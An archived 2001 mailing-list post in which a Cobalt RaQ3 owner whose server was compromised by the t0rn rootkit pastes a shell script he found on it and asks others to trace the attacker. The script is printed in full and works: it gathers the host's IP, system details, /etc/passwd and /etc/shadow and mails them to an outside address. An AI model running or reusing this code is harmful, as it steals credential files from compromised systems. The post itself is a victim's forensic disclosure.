[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[cobalt-users] Raq3 t0rn hack -- The hackers left an email address?!
- Subject: [cobalt-users] Raq3 t0rn hack -- The hackers left an email address?!
- From: Cobalt Newbie <mfahy@xxxxxxxxx>
- Date: Mon Feb 26 17:20:28 2001
- List-id: Mailing list for users to share thoughts on Cobalt products. <cobalt-users.list.cobalt.com>
Ok, after much twiddling around, I found the following script named
"getip.sh" on my severely hacked box:
The most interesting thing here, I figured, is the email address to which
everything's being sent. Any security gods out there want to trace it?
For those interested, I seem to have located the install scripts, too...
Now what??
#!/bin/sh
PATH="/usr/bin:/bin:/usr/local/bin/:/usr/sbin/:/sbin"
export PATH
route -n | while read A
do
GW=`echo $A | awk '{printf("%s",$1)}'`
if [ $GW = "0.0.0.0" ]
then
IFACE=`echo $A | awk '{printf("%s",$8)}'`
ifconfig $IFACE | while read B
do
CMP=`echo $B | awk '{printf("%s",$1)}'`
if [ $CMP = "inet" ]
then
MYIP=`echo $B | cut -d: -f 2 | awk '{printf("%s",$1)}'`
# echo "my default iface is $IFACE and my ip is $MYIP"
echo $MYIP > myip
exit
fi
done
fi
done
echo You owned this one: > mail.log
cat myip >> mail.log
echo name: >> mail.log
uname -a >> mail.log
echo network: >> mail.log
/sbin/ifconfig -a >> mail.log
echo passwd: >> mail.log
cat /etc/passwd >> mail.log
echo shadow: >> mail.log
cat /etc/shadow >> mail.log
mail -s `cat myip` 1i0nsniffer@xxxxxxxxx < mail.log
rm -rf mail.log